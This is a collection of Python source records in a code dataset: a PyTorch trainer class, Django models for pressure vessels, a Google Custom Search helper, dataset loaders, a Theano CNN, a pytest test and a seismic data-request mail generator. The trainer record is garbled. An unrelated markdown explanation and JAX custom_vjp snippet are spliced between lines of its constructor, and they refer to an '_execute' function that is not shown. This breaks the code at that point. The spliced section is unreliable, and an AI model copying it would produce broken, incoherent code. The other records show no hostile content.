best_eval_score (float): best validation score so far (higher better)\n num_iterations (int): useful when loading the model from the checkpoint\n num_epoch (int): useful when loading the model from the checkpoint\n \"\"\"\n\n def __init__(self, model, optimizer, lr_scheduler, loss_criterion,\n eval_criterion, device, loaders, checkpoint_dir,\n max_num_epochs=1000, max_num_iterations=None,\n validate_after_iters=None, log_after_iters=None,\n validate_iters=None, num_iterations=0, num_epoch=0,\n eval_score_higher_is_better=True, best_eval_score=None,\n logger=None, inference_config = None):\n if logger is None:\n self.logger = get_logger('Trainer', level=logging.DEBUG)\n else:\n self.logger = logger\n self.plotter = VisdomLinePlotter('gcn')\n\n self.logger.info(model)\n self.model = model\n self.optimizer = optimizer\n self.scheduler = lr_scheduler\n self.loss_criterion = loss_criterion\n self.eval_criterion = eval_criterion\n self.device = device\n self.loaders = loaders\n self.checkpoint_dir = checkpoint_dir\n self.max_num_epochs = max_num_epochs\n self.max_num_iterations = max_num_iterations\n self.validate_after_iters = validate_after_iters\n self.log_after_iters = log_after_iters\n self.validate_iters = validate_iters\n self.eval_score_higher_is_better = eval_score_higher_is_better\n self.inference_config = inference_config\n 
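`_execute` above wires a device-computed Jacobian into JAX's reverse-mode autodiff with `jax.custom_vjp`, using `host_callback.call` to run the non-JAX device code. The `custom_vjp` mechanics in miniature, with a pure Python function standing in for the device call:

```python
import jax

@jax.custom_vjp
def square(x):
    return x * x

def square_fwd(x):
    # forward pass: return output plus residuals for the backward pass
    return square(x), x

def square_bwd(x, g):
    # backward pass: cotangent g times d(x^2)/dx = 2x
    return (2.0 * x * g,)

square.defvjp(square_fwd, square_bwd)

print(jax.grad(square)(3.0))  # 6.0
```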
logger.info(f'eval_score_higher_is_better: {eval_score_higher_is_better}')\n\n if best_eval_score is not None:\n self.best_eval_score = best_eval_score\n else:\n # initialize the best_eval_score\n if eval_score_higher_is_better:\n self.best_eval_score = float('-inf')\n else:\n self.best_eval_score = float('+inf')\n\n self.writer = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'logs'))\n\n self.num_iterations = num_iterations\n self.num_epoch = num_epoch\n\n @classmethod\n def from_checkpoint(cls, checkpoint_path, model, optimizer, lr_scheduler, loss_criterion, eval_criterion,\n device, loaders, logger=None, inference_config = None):\n logger.info(f\"Loading checkpoint '{checkpoint_path}'...\")\n state = load_checkpoint(checkpoint_path, model, optimizer)\n logger.info(\n f\"Checkpoint loaded. Epoch: {state['epoch']}. Best val score: {state['best_eval_score']}. Num_iterations: {state['num_iterations']}\")\n checkpoint_dir = os.path.split(checkpoint_path)[0]\n return cls(model, optimizer, lr_scheduler,\n loss_criterion, eval_criterion,\n device, loaders, checkpoint_dir,\n eval_score_higher_is_better=state['eval_score_higher_is_better'],\n best_eval_score=state['best_eval_score'],\n num_iterations=state['num_iterations'],\n num_epoch=state['epoch'],\n max_num_epochs=state['max_num_epochs'],\n max_num_iterations=state['max_num_iterations'],\n validate_after_iters=state['validate_after_iters'],\n log_after_iters=state['log_after_iters'],\n validate_iters=state['validate_iters'],\n logger=logger, inference_config = inference_config)\n\n @classmethod\n def from_pretrained(cls, pre_trained, model, optimizer, lr_scheduler, loss_criterion, eval_criterion,\n device, loaders,\n max_num_epochs=1000, max_num_iterations=None,\n validate_after_iters=None, log_after_iters=None,\n validate_iters=None, num_iterations=0, num_epoch=0,\n eval_score_higher_is_better=True, best_eval_score=None,\n logger=None, inference_config = None):\n logger.info(f\"Logging pre-trained model from '{pre_trained}'...\")\n load_checkpoint(pre_trained, model, None)\n checkpoint_dir = os.path.split(pre_trained)[0]\n return cls(model, optimizer, lr_scheduler,\n loss_criterion, eval_criterion,\n device, loaders, checkpoint_dir,\n eval_score_higher_is_better=eval_score_higher_is_better,\n best_eval_score=best_eval_score,\n num_iterations=num_iterations,\n num_epoch=num_epoch,\n max_num_epochs=max_num_epochs,\n max_num_iterations=max_num_iterations,\n validate_after_iters=validate_after_iters,\n log_after_iters=log_after_iters,\n validate_iters=validate_iters,\n logger=logger, inference_config = inference_config)\n\n def fit(self):\n for _ in range(self.num_epoch, self.max_num_epochs):\n # train for one epoch\n should_terminate = self.train(self.loaders['train'])\n\n if should_terminate:\n break\n\n self.num_epoch += 1\n\n def train(self, train_loader):\n \"\"\"Trains the model for 1 epoch.\n\n Args:\n train_loader (torch.utils.data.DataLoader): training data loader\n\n Returns:\n True if the training should be terminated immediately, False otherwise\n \"\"\"\n train_losses = RunningAverage()\n train_eval_scores = RunningAverage()\n self.logger.info(\n f'Training epoch [{self.num_epoch}/{self.max_num_epochs - 1}], iteration per epoch: {len(train_loader)}. 
')\n # sets the model in training mode\n self.model.train()\n if self.validate_after_iters is None:\n self.validate_after_iters = len(train_loader)\n if self.log_after_iters is None:\n self.log_after_iters = self.validate_after_iters\n if self.max_num_iterations is None:\n self.max_num_iterations = self.max_num_epochs * len(train_loader)\n\n for i, t in enumerate(train_loader):\n target = t.y.to(self.device)\n input = t.to(self.device)\n output, h = self.model(input)\n\n # compute loss criterion\n loss = self.loss_criterion(output, target)\n train_losses.update(loss.item(), get_batch_size(target))\n\n # compute eval criterion\n eval_score = self.eval_criterion(output, target)\n train_eval_scores.update(eval_score.item(), get_batch_size(target))\n\n # compute gradients and update parameters\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n if self.num_iterations % self.log_after_iters == 0:\n # log stats and params\n self.logger.info(\n f'Training iteration [{self.num_iterations}/{self.max_num_iterations - 1}]. Batch [{i}/{len(train_loader) - 1}]. Epoch [{self.num_epoch}/{self.max_num_epochs - 1}]')\n self.logger.info(\n f'Training stats. Loss: {train_losses.avg}. Evaluation score: {train_eval_scores.avg}')\n self._log_stats('train', train_losses.avg, train_eval_scores.avg)\n self.plotter.plot('loss', 'train', 'loss', self.num_iterations, train_losses.avg, xlabel='Iter')\n self.plotter.plot('accuracy', 'train', 'accuracy', self.num_iterations, train_eval_scores.avg, xlabel='Iter')\n\n train_losses = RunningAverage()\n train_eval_scores = RunningAverage()\n\n if self.num_iterations % self.validate_after_iters == 0:\n # evaluate on validation set\n eval_score = self.validate(self.loaders['val'])\n # adjust learning rate if necessary\n if isinstance(self.scheduler, ReduceLROnPlateau):\n self.scheduler.step(eval_score)\n else:\n self.scheduler.step()\n # log current learning rate in tensorboard\n self._log_lr()\n # remember best validation metric\n is_best = self._is_best_eval_score(eval_score)\n # save checkpoint\n self._save_checkpoint(is_best)\n self._log_params()\n\n if self.inference_config is not None:\n if (self.num_iterations >= self.inference_config['infer_init_iters'] and\n self.num_iterations % self.inference_config['infer_after_iters'] == 0):\n self.inference(self.loaders, h)\n\n if self.num_iterations >= self.max_num_iterations:\n self.logger.info(\n f'Maximum number of iterations {self.max_num_iterations} exceeded. Finishing training...')\n return True\n\n self.num_iterations += 1\n\n return False\n\n def validate(self, val_loader):\n\n val_losses = RunningAverage()\n val_scores = RunningAverage()\n \n self.logger.info(f'Validating epoch [{self.num_epoch}/{self.max_num_epochs - 1}]. 
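Note the scheduler dispatch in `train` above: `ReduceLROnPlateau.step` wants the monitored metric, while other schedulers step unconditionally. That two-branch idiom in isolation (sketch):

```python
import torch
from torch.optim.lr_scheduler import ReduceLROnPlateau

model = torch.nn.Linear(4, 2)
optimizer = torch.optim.SGD(model.parameters(), lr=0.1)
scheduler = ReduceLROnPlateau(optimizer, mode="max", patience=2)

eval_score = 0.75  # stand-in for the validation metric
if isinstance(scheduler, ReduceLROnPlateau):
    scheduler.step(eval_score)  # plateau scheduler consumes the metric
else:
    scheduler.step()            # e.g. StepLR steps on a fixed schedule
print(optimizer.param_groups[0]["lr"])
```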
')\n if self.validate_iters is None:\n self.validate_iters = len(val_loader)\n val_iterator = iter(val_loader)\n \n try:\n self.model.eval()\n with torch.no_grad():\n for _ in tqdm(range(self.validate_iters)):\n try:\n t = next(val_iterator)\n except StopIteration:\n val_iterator = iter(val_loader)\n t = next(val_iterator)\n\n target = t.y.to(self.device)\n input = t.to(self.device)\n output, _ = self.model(input)\n\n # compute loss criterion\n loss = self.loss_criterion(output, target)\n val_losses.update(loss.item(), get_batch_size(target))\n\n # compute eval criterion\n eval_score = self.eval_criterion(output, target)\n val_scores.update(eval_score.item(), get_batch_size(target))\n\n self._log_stats('val', val_losses.avg, val_scores.avg)\n self.logger.info(f'Validation finished. Loss: {val_losses.avg}. Evaluation score: {val_scores.avg}')\n self.plotter.plot('loss', 'val', 'loss', self.num_iterations, val_losses.avg, xlabel='Iter')\n self.plotter.plot('accuracy', 'val', 'accuracy', self.num_iterations, val_scores.avg, xlabel='Iter')\n\n return val_scores.avg\n finally:\n # set back in training mode\n self.model.train()\n \n def inference(self, loaders, h):\n self.logger.info(f'Infering hidden data... ')\n return\n \n def _is_best_eval_score(self, eval_score):\n if self.eval_score_higher_is_better:\n is_best = eval_score > self.best_eval_score\n else:\n is_best = eval_score < self.best_eval_score\n\n if is_best:\n self.logger.info(f'Saving new best evaluation metric: {eval_score}')\n self.best_eval_score = eval_score\n return is_best\n\n def _save_checkpoint(self, is_best):\n if torch.cuda.device_count() > 1:\n model_state = self.model.module.state_dict()\n else:\n model_state = self.model.state_dict()\n save_checkpoint({\n 'epoch': self.num_epoch + 1,\n 'num_iterations': self.num_iterations,\n 'model_state_dict': model_state,\n 'best_eval_score': self.best_eval_score,\n 'eval_score_higher_is_better': self.eval_score_higher_is_better,\n 'optimizer_state_dict': self.optimizer.state_dict(),\n 'device': str(self.device),\n 'max_num_epochs': self.max_num_epochs,\n 'max_num_iterations': self.max_num_iterations,\n 'validate_after_iters': self.validate_after_iters,\n 'log_after_iters': self.log_after_iters,\n 'validate_iters': self.validate_iters\n }, is_best, checkpoint_dir=self.checkpoint_dir,\n logger=self.logger)\n\n def _log_lr(self):\n lr = self.optimizer.param_groups[0]['lr']\n self.writer.add_scalar('learning_rate', lr, self.num_iterations)\n\n def _log_stats(self, phase, loss_avg, eval_score_avg):\n tag_value = {\n f'{phase}_loss_avg': loss_avg,\n f'{phase}_eval_score_avg': eval_score_avg\n }\n\n for tag, value in tag_value.items():\n self.writer.add_scalar(tag, value, self.num_iterations)\n\n def _log_params(self):\n self.logger.info('Logging model parameters and gradients')\n for name, value in self.model.named_parameters():\n self.writer.add_histogram(name, value.data.cpu().numpy(), self.num_iterations)\n self.writer.add_histogram(name + '/grad', value.grad.data.cpu().numpy(), self.num_iterations)","sub_path":"utils/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":14865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"619988717","text":"from django.db import models\n\nclass Container(models.Model):\n name = models.CharField('Обозначение сосуда', max_length=50)\n _type = models.ForeignKey(\n 'ContainerType',\n verbose_name='Тип сосуда'\n )\n factory = models.ForeignKey(\n 'Factory',\n 
verbose_name='Завод-изготовитель'\n )\n #serial_number = models.CharField('Заводской номер', max_length=50, null=True, blank=True)\n #scheme = models.CharField('Номер чертежа', max_length=50, null=True, blank=True)\n #reg_number = models.CharField('Регистрационный номер', max_length=50, null=True, blank=True)\n #inv_number = models.CharField('Инвентарный номер', max_length=50, null=True, blank=True)\n #manufactured_year = models.PositiveSmallIntegerField('Год изготовления', null=True, blank=True)\n #started_year = models.PositiveSmallIntegerField('Год ввода в эксплуатацию', null=True, blank=True)\n #location = models.CharField('Место установки', max_length=200, null=True, blank=True)\n # Working conditions\n p_calc = models.FloatField('Давление расчетное, МПа')\n p_work = models.FloatField('Давление рабочее, МПа')\n p_test = models.FloatField('Давление пробное, МПа')\n temp_walls = models.SmallIntegerField('Расчетная температура стенок, ⁰С')\n temp_carrier_low = models.CharField('Рабочая температура среды (нижняя граница), ⁰С', max_length=50)\n temp_carrier_high = models.CharField('Рабочая температура среды (верхняя граница), ⁰С', max_length=50)\n carrier = models.ForeignKey(\n 'Carrier',\n verbose_name='Технологическая среда'\n )\n danger_class = models.PositiveSmallIntegerField('Класс опасности технологической среды по ГОСТ 12.1.007-76')\n explosiveness = models.CharField('Взрывоопасность', max_length=200)\n firehazard = models.CharField('Пожароопасность', max_length=200)\n volume = models.FloatField('Объем рабочий, м3')\n weight = models.PositiveSmallIntegerField('Масса сосуда (пустого), кг')\n insulatuion = models.CharField('Наличие и вид тепловой изоляции', max_length=100)\n lifetime = models.PositiveSmallIntegerField('Срок службы, лет')\n mode = models.CharField('Режим нагружения', max_length=50)\n dimensions_width_ring = models.PositiveSmallIntegerField('Внутренний диаметр обечайки, мм', blank = True, null = True)\n dimensions_width_bottom = models.PositiveSmallIntegerField('Внутренний диаметр днища, мм', blank = True, null = True)\n dimensions_width_top = models.PositiveSmallIntegerField('Диаметр плоской крышки, мм', blank = True, null = True)\n dimensions_height_ring = models.PositiveSmallIntegerField('Высота обечайки, мм', blank = True, null = True)\n dimensions_height_bottom = models.PositiveSmallIntegerField('Высота днища, мм', blank = True, null = True)\n dimensions_height_total = models.PositiveSmallIntegerField('Высота сосуда (общая)', blank = True, null = True)\n dimensions_side_ring = models.FloatField('Толщина стенок обечайки (проектная), мм', blank = True, null = True)\n dimensions_side_bottom = models.FloatField('Толщина стенок днища (проектная), мм', blank = True, null = True)\n dimensions_side_top = models.FloatField('Толщина стенок крышки (проектная), мм', blank = True, null = True)\n material_ring = models.ForeignKey(\n 'Material',\n verbose_name='Материал обечайки',\n related_name='material_ring'\n )\n material_bottom = models.ForeignKey(\n 'Material',\n verbose_name='Материал днища',\n related_name='material_bottom'\n )\n welding = models.ForeignKey(\n 'Welding',\n verbose_name='Сведения о сварке'\n )\n control = models.ForeignKey(\n 'Control',\n verbose_name='Контроль при изготовлении'\n )\n\n def __str__(self):\n return self.name\n #return '{} зав.№ {}, рег.№ {}, инв.№ {}'.format(\n # self.name.lower(),\n # self.serial_number,\n # self.reg_number,\n # self.inv_number,\n #)\n\n class Meta:\n verbose_name = 'Сосуд'\n verbose_name_plural = 'Сосуды'\n\nclass 
ContainerType(models.Model):\n _type = models.CharField('Тип сосуда', max_length=100)\n\n def __str__(self):\n return self._type\n\n class Meta:\n verbose_name = 'Тип сосуда'\n verbose_name_plural = 'Типы сосудов'\n\nclass Factory(models.Model):\n name = models.CharField('Наименование завода', unique=True, max_length=200)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Завод-изготовитель'\n verbose_name_plural = 'Заводы-изготовители'\n\nclass Carrier(models.Model):\n name = models.CharField('Тип носителя', unique=True, max_length=200)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Носитель'\n verbose_name_plural = 'Носители'\n\nclass Material(models.Model):\n name = models.CharField('Наименование материала', unique=True, max_length=200)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Материал'\n verbose_name_plural = 'Материалы'\n\nclass Welding(models.Model):\n name = models.CharField('Вид сварки', max_length=200)\n material = models.CharField('Материал сварки', max_length=200)\n\n def __str__(self):\n return '{} ({})'.format(self.name, self.material)\n\n class Meta:\n verbose_name = 'Сварка'\n verbose_name_plural = 'Сварка'\n\nclass Control(models.Model):\n name = models.CharField('Метод контроля при изготовлении', max_length=200)\n area = models.CharField('Объем контроля при изготовлении', max_length=200)\n\n def __str__(self):\n return '{} {}'.format(self.name, self.area)\n\n class Meta:\n verbose_name = 'Контроль'\n verbose_name_plural = 'Контроль'\n","sub_path":"gmp/apps/containers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"394561858","text":"import pprint\nfrom urllib.parse import urlparse\nimport json\nfrom googleapiclient.discovery import build # CustomSearch API client library\n# Installation instructions: https://developers.google.com/api-client-library/python/apis/customsearch/v1\n\ndef search(query, st = 1):\n # Load settings from the JSON config file\n with open('config.json', 'r') as f:\n config = json.load(f)\n # Custom search engine credentials\n # http://code.google.com/apis/console\n service = build('customsearch', 'v1', # API name and version\n developerKey = config['developerKey']) # search engine developer key\n # Search parameters\n res = service.cse().list(\n q = query, # query string\n cx = config['cx'], # search engine ID https://support.google.com/customsearch/answer/2649143?hl=en\n num = 10, # number of results, 10 at most\n lr = 'lang_ru', # language\n start = st, # index of the result after which the next ones are returned\n cr = 'countryRU'\n ).execute()\n links = []\n # print(type (res['items']))\n # print(res['items'])\n # Build the list of result links\n for i in res['items']:\n parsed_uri = urlparse(i['link'])\n # Extract the domain from the URL\n domain = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_uri)\n links.append(domain)\n\n #pprint.pprint(res)\n return links\nif __name__ == '__main__':\n pprint.pprint(search(input()))","sub_path":"GSearch.py","file_name":"GSearch.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"129811209","text":"# -----------------------------------------------------------------------\r\n# Modified from imaginaire(https://github.com/NVlabs/imaginaire)\r\n# -----------------------------------------------------------------------\r\n# Copyright (C) 2020 NVIDIA Corporation. 
All rights reserved.\r\n#\r\n# This work is made available under the Nvidia Source Code License-NC.\r\n# To view a copy of this license, check out LICENSE.md\r\n# -----------------------------------------------------------------------\r\n\r\nfrom .pose_dataset import PoseDataset\r\nfrom .face_dataset import FaceDataset\r\n\r\n\r\ndef get_train_and_val_dataloader(cfg):\r\n \"\"\"\r\n Return dataset objects for the training and validation sets.\r\n\r\n Args:\r\n cfg (obj): Global configuration file.\r\n \r\n Returns:\r\n (tuple):\r\n - train_dataset (obj): Train dataset.\r\n - val_dataset (obj): Val dataset.\r\n \"\"\"\r\n train_dataset, val_dataset = _get_train_and_val_dataset_objects(cfg)\r\n # train_reader = train_dataset.batch_reader(cfg.train_data.batch_size)\r\n # val_reader = val_dataset.batch_reader(cfg.val_data.batch_size)\r\n return train_dataset, val_dataset\r\n\r\n\r\ndef _get_train_and_val_dataset_objects(cfg):\r\n if cfg.data.name == 'pose':\r\n train_dataset = PoseDataset()\r\n val_dataset = PoseDataset()\r\n train_dataset.initialize(cfg.train_data)\r\n val_dataset.initialize(cfg.val_data)\r\n else:\r\n raise NotImplementedError()\r\n \r\n print(\"Train dataset length: \", len(train_dataset))\r\n print(\"Val dataset length: \", len(val_dataset))\r\n\r\n return train_dataset, val_dataset\r\n\r\n\r\ndef get_val_dataset(cfg):\r\n val_dataset = PoseDataset()\r\n val_dataset.initialize(cfg.val_data)\r\n print(\"Val dataset length: \", len(val_dataset))\r\n return val_dataset\r\n\r\n\r\ndef get_test_data_loader(cfg):\r\n \"\"\"\r\n Return the dataset object for the test (inference) set.\r\n\r\n Args:\r\n cfg (obj): Global configuration file.\r\n \r\n Returns:\r\n test_dataset (obj): Test dataset.\r\n \"\"\"\r\n if cfg.data.name == 'pose':\r\n test_dataset = PoseDataset()\r\n test_dataset.initialize(cfg.inference_data)\r\n elif cfg.data.name == 'faceForensics':\r\n test_dataset = FaceDataset()\r\n test_dataset.initialize(cfg.inference_data)\r\n else:\r\n # avoid returning an undefined name for unknown dataset types\r\n raise NotImplementedError()\r\n\r\n return test_dataset\r\n","sub_path":"vid2vid/datasets/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"193490292","text":"import numpy as np\n\nimport theano\nimport theano.tensor as T\nfrom theano.tensor.signal import pool\nfrom theano.tensor.nnet import conv2d\n\nfrom LogisticRegression import LogisticRegression\nfrom utils import load_data\nfrom util_layers import LeNetConvPoolLayer, HiddenLayer, negative_log_likelihood\n\nclass CNN(object):\n\n def __init__(self, input, image_shape, numpy_rng, filter_sizes, batch_size, n_out=10):\n\n # instance variables\n self.numpy_rng = numpy_rng\n self.input = input\n self.image_shape = image_shape\n self.filter_sizes = filter_sizes\n self.n_out = n_out\n self.batch_size = batch_size\n self.params = []\n\n self.initialize_variables()\n\n ################\n ## Prediction ##\n ################\n self.y_pred = self.logistic_regression_layer.y_pred\n\n def initialize_variables(self):\n\n # Reshape matrix of rasterized images of shape (batch_size, 28 * 28)\n # to a 4D tensor, compatible with our LeNetConvPoolLayer\n # (28, 28) is the size of MNIST images.\n self.layer0_input = self.input.reshape(self.image_shape)\n\n # Construct the first convolutional pooling layer:\n # filtering reduces the image size to (28-5+1 , 28-5+1) = (24, 24)\n # maxpooling reduces this further to (24/2, 
24/2) = (12, 12)\n # 4D output tensor is thus of shape (batch_size, filter_sizes[0], 12, 12)\n self.conv_layer = LeNetConvPoolLayer(\n rng = self.numpy_rng,\n input=self.layer0_input,\n image_shape=(-1, self.image_shape[1], self.image_shape[2], self.image_shape[3]),\n filter_shape=(self.filter_sizes[0], 1, 5, 5),\n poolsize=(2, 2)\n )\n self.params.extend(self.conv_layer.params)\n\n self.hidden_layer_input = self.conv_layer.output.flatten(2)\n\n # construct a fully-connected sigmoidal layer\n self.hidden_layer = HiddenLayer(\n rng=self.numpy_rng,\n input=self.hidden_layer_input,\n n_in=self.filter_sizes[0] * 12 * 12,\n n_out=500,\n activation=T.tanh\n )\n self.params.extend(self.hidden_layer.params)\n\n # classify the values of the fully-connected sigmoidal layer\n self.logistic_regression_layer = LogisticRegression(input=self.hidden_layer.output, n_in=500, n_out=self.n_out)\n self.params.extend(self.logistic_regression_layer.params)\n \n ##################################\n # Training Step Helper Functions #\n ##################################\n\n def get_cost(self, y, L1_reg, L2_reg):\n # loss function (without regularization)\n self.loss = negative_log_likelihood( \n self.logistic_regression_layer.p_y_given_x, \n y)\n\n # L1 norm ; one regularization option is to enforce L1 norm to\n # be small\n self.L1 = L1_reg * ( abs(self.conv_layer.W).sum()\n + abs(self.hidden_layer.W).sum()\n + abs(self.logistic_regression_layer.W).sum()\n )\n\n # square of L2 norm ; one regularization option is to enforce\n # square of L2 norm to be small\n self.L2_sqr = L2_reg * ( (self.conv_layer.W ** 2).sum()\n + (self.hidden_layer.W ** 2).sum()\n + (self.logistic_regression_layer.W ** 2).sum()\n )\n\n self.cost = self.loss + self.L1 + self.L2_sqr\n return self.cost\n\n def get_updates(self, cost, learning_rate):\n # compute the gradient of cost with respect to theta (stored in params)\n # the resulting gradients will be stored in a list grads\n grads = [T.grad(cost, param) for param in self.params]\n\n updates = [\n (param, param - learning_rate * gparam)\n for param, gparam in zip(self.params, grads)\n ]\n return updates\n\n def get_cost_updates(self, y, L1_reg, L2_reg, learning_rate):\n cost = self.get_cost(y, L1_reg, L2_reg)\n updates = self.get_updates(cost, learning_rate)\n return cost, updates\n\n ##############################################\n # Accessor Methods for training step outputs #\n ##############################################\n\n def errors(self, y):\n return self.logistic_regression_layer.errors(y)\n\n def get_latest_cost(self):\n return self.cost\n\n def get_loss(self):\n return self.loss\n\n def get_L1(self):\n return self.L1\n\n def get_L2_sqr(self):\n return self.L2_sqr","sub_path":"scripts/Theano2/CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":4616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"245048063","text":"from datetime import datetime\nfrom typing import Dict\nfrom dynamodb_tools.entity import Entity, get_class_properties\nfrom chalicelib.reading import Reading\n\n\ndef test_reading_new():\n question = \"Will Donald Trump win a second term in office?\"\n username = \"john.smith@company.com\"\n deck = \"modernTarot\"\n layout = \"worldEvents\"\n reading = Reading.new(question=question,\n username=username,\n deck=deck,\n layout=layout)\n assert reading.question == question\n assert reading.deck == deck\n assert reading.layout == layout\n assert len(reading.id) == 10\n assert 
isinstance(reading.date_created, datetime)\n assert reading.date_modified is None\n d = reading.date_created\n year = d.year\n month = d.strftime('%m')\n day = d.strftime('%d')\n hour = d.strftime('%H')\n minute = d.strftime('%M')\n second = d.strftime('%S')\n utc_tight_zulu = f\"{year}{month}{day}T{hour}{minute}{second}Z\"\n assert reading.pk == f\"reading~{reading.username}\"\n assert reading.sk == f\"reading~{utc_tight_zulu}~{reading.id}\"\n\n\ndef test_reading_load_and_dump():\n data = {\n \"pk\": \"reading~dave.jones@some.org\",\n \"sk\": \"reading~20191202T090000Z~d4e5f6\",\n \"id\": \"d4e5f6\",\n \"entity\": \"reading\",\n \"question\": \"Will Donald Trump win a second term in office?\",\n \"username\": \"dave.jones@some.org\",\n \"dateCreated\": \"20191202T090000Z\",\n \"dateModified\": \"20191202T090230Z\",\n \"deck\": \"traditionalTarot\",\n \"layout\": \"quick\",\n \"placements\": {},\n \"notes\": None\n }\n reading = Reading.load(data)\n assert isinstance(reading.date_created, datetime)\n assert isinstance(reading.date_modified, datetime)\n assert reading.pk == data[\"pk\"]\n assert reading.sk == data[\"sk\"]\n dumped = reading.dump()\n assert dumped == data\n\n","sub_path":"tests/test_reading.py","file_name":"test_reading.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"645892693","text":"'''\ncadena = 'Este es un atributo '\ncadenaNueva = cadena + 'nuevo'\nprint('Flujo : ', cadenaNueva)\nprint(cadenaNueva[0:4])\n'''\n\n# distancias = (('pereira','bogota',230),('pereira','cali',260))\n# print(distancias)\n\nitinerario = [['Santa Marta',1],['Cartagena',2],['San Andrés',4]]\nitinerario.append(['Providencia',2])\nitinerario.pop(1)\nitinerario[0][1] += 1\nitinerario[0],itinerario[-1] = itinerario[-1],itinerario[0]\n# itinerario[-1] = itinerario[0]\nprint(itinerario)\n\n'''\nfor posicion, valor in enumerate(itinerario):\n print('posicion: ', posicion)\n print('valor', valor[0])\n'''\n\nfor iti in range(len(itinerario)):\n print('posicion: ', iti)\n print('valor: ', itinerario[iti])\n\n\n\n","sub_path":"Mision-TIC-GRUPO-09-master(16-06-21)/semana 3/ejercicio9.py","file_name":"ejercicio9.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"57011265","text":"\"\"\"\nmail content sent by breqfast.\n\"\"\"\nimport sh\nimport obspy\nimport pandas as pd\n\ntemplate = \"\"\".NAME ziyixi\n.INST Michigan State University\n.MAIL CMSE, MSU, East Lansing, MI, 48824\n.EMAIL ziyixi@mail.ustc.edu.cn\n.PHONE 517 505-0802\n.FAX 517 505-0802\n.MEDIA FTP\n.ALTERNATE MEDIA 1/2\" tape - 6250\n.ALTERNATE MEDIA EXABYTE\n.LABEL {label}\n.SOURCE ~NEIC PDE~Jan 1990 PDE~National Earthquake Information Center - USGS DOI~\n.HYPO ~{year} {month} {day} {hour} {minute} {second}~ {latitude}~ {longitude}~{depth}~18~216~{region}~\n.MAGNITUDE ~{magnitude}~mw~\n.QUALITY B\n.END\n{station_information}\n\"\"\"\n\n\ndef create_mail_contents():\n mail_list = []\n events = obspy.read_events(\"./Japan_slab/*\")\n sh.mkdir(\"-p\", \"./mails_ziyixi\")\n\n stations = pd.read_csv(\n \"./fdsn_stations\",\n sep=\"\\s+\",\n names=[\"station\", \"network\", \"lat\", \"lon\", \"elv\", \"dep\"],\n )\n\n for item in events:\n station_information = \"\"\n starttime = item.origins[0].time - 2 * 60\n endtime = item.origins[0].time + 40 * 60\n for index, row in stations.iterrows():\n station_information += f\"{row.station} {row.network} 
{starttime.year} {starttime.month} {starttime.day} {starttime.hour} {starttime.minute} {round(starttime.second + (1e-6) * starttime.microsecond,2)} {endtime.year} {endtime.month} {endtime.day} {endtime.hour} {endtime.minute} {round(endtime.second + (1e-6) * endtime.microsecond,2)} 2 BH? HH?\\n\"\n\n mail_content = template.format(\n label=item.origins[0].resource_id.id.split(\"/\")[2],\n year=item.origins[0].time.year,\n month=item.origins[0].time.month,\n day=item.origins[0].time.day,\n hour=item.origins[0].time.hour,\n minute=item.origins[0].time.minute,\n second=round(\n item.origins[0].time.second +\n (1e-6) * item.origins[0].time.microsecond,\n 2,\n ),\n latitude=item.origins[0].latitude,\n longitude=item.origins[0].longitude,\n depth=item.origins[0].depth / 1000,\n region=item.origins[0].region,\n magnitude=item.magnitudes[0].mag,\n station_information=station_information,\n )\n\n with open(f\"./mails_ziyixi/{item.origins[0].resource_id.id.split('/')[2]}\", \"w\") as f:\n f.write(mail_content)\n\n\nif __name__ == \"__main__\":\n create_mail_contents()\n","sub_path":"download_data/fdsn/breqfast/build_breqfast_mailcontent.py","file_name":"build_breqfast_mailcontent.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}